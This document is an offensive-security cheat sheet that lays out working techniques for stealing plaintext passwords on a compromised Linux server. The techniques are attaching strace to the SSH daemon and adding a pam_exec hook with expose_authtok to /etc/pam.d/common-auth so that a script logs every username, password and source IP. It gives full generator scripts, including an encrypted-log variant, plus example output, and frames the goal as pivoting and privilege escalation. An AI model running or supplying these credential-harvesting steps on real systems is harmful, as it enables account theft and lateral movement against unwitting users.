# Sniffing Passwords ## Strace With root access on a server we can attach to the SSH service and sniff usernames and passwords in plaintext if a user authenticates. This can be powerful when looking for new accounts to pivot with and/or higher privileged accounts. ```bash [root@victimHost ~]# w 15:05:18 up 26 days, 6:25, 2 users, load average: 0.00, 0.05, 0.16 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT unixadm pts/0 someHost 15:04 6.00s 0.03s 0.00s sshd: unixadm [priv] [root@victimHost ~]# ps aux | grep ssh root 1366 0.0 0.0 113000 4368 ? Ss Jun02 0:00 /usr/sbin/sshd -D unixadm 28721 0.0 0.0 176412 2644 ? S 10:04 0:00 sshd: unixadm@pts/0 [root@victimHost ~]# kill 28721 [root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log strace: Process 1366 attached ``` *** ## PAM With root access on a server we can create a simple bash script to log all authorization requests handled by `pam.d`. The log data will show a timestamp, username, password and source IP all in cleartext. This is of course very useful when trying to pivot and/or escalate privileges. ### Encrypted logs The below helper script will create a new, `pam_log.sh`, script to be uploaded on a target host. ```bash #!/bin/bash KEY_DIR="./ssh_key_pair" PRIVATE_KEY_PATH="${KEY_DIR}/pam-id_rsa" PUBLIC_KEY_PATH="${KEY_DIR}/pam-id_rsa.pub" PEM_KEY_PATH="${KEY_DIR}/pam-id_rsa.pem" LOG_SCRIPT_PATH="./pam_log.sh" mkdir -p "$KEY_DIR" echo "[+] Generating SSH key pair..." ssh-keygen -t rsa -b 4096 -m PEM -f "$PRIVATE_KEY_PATH" -N "" >/dev/null echo "[+] Extracting public key in PEM format..." ssh-keygen -e -f "$PUBLIC_KEY_PATH" -m PEM > "${PEM_KEY_PATH}" SSH_PUBLIC_KEY=$(cat "${PEM_KEY_PATH}" | sed ':a;N;$!ba;s/\n/\\n/g') echo "[+] Creating the log script..." cat < "$LOG_SCRIPT_PATH" #!/bin/bash SSH_PUBLIC_KEY="$SSH_PUBLIC_KEY" LOG_ENTRY=" \$(date) \${PAM_USER}, \$(cat -), From: \${PAM_RHOST}" echo "\$LOG_ENTRY" | openssl pkeyutl -encrypt -inkey <(echo -e "\$SSH_PUBLIC_KEY" | sed 's/\\n/\n/g') -pubin | base64 >> /var/log/creds.log EOF chmod +x "$LOG_SCRIPT_PATH" echo "[+] Generated log script: $LOG_SCRIPT_PATH" echo -e "\n[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decypt -inkey $PRIVATE_KEY_PATH" ``` ```bash kdev :: ~/log » ./create_pam_log.sh [+] Generating SSH key pair... [+] Extracting public key in PEM format... [+] Creating the log script... [+] Generated log script: ./pam_log.sh [i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decypt -inkey ./ssh_key_pair/pam-id_rsa ``` Upload `pam_log.sh` to the target and modify `/etc/pam.d/common-auth` to execute the script on authentication requests. ```bash kdev :: ~ » echo "auth optional pam_exec.so quiet expose_authtok /home/void/log/pam_log.sh" | sudo tee -a /etc/pam.d/common-auth ``` Wait for a user to login and reap the rewards. Other users are unable to to read the content without having the private key. ```bash kdev :: ~/log » cat /var/log/creds.log WNGIdThHgz[...]Hww2aa0= kdev :: ~/log » cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa Fri Mar 14 11:18:14 CET 2025 void, Passw0rd!, From: ::1 ``` ### Unencrypted logs If you don't care about the security aspects, or if the target doesn't have `openssl` or `base64` installed, you can instead use this simple unencrypted version to log authentication requests. ```bash ## Create the simple script to log logins $ chmod 700 /usr/local/bin/capture.sh $ cat /usr/local/bin/capture.sh #!/bin/sh echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/creds.log ## Create log file and set high permissions so no unauthorized user reads it $ touch /var/log/creds.log $ chmod 600 /var/log/creds.log ## Edit /etc/pam.d/common-auth and add the following line $ cat /etc/pam.d/common-auth ... auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh ## All services using PAM will now be logged to /var/log/creds.log in clear text ➜ ~ cat /var/log/creds.log Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: ::1 ```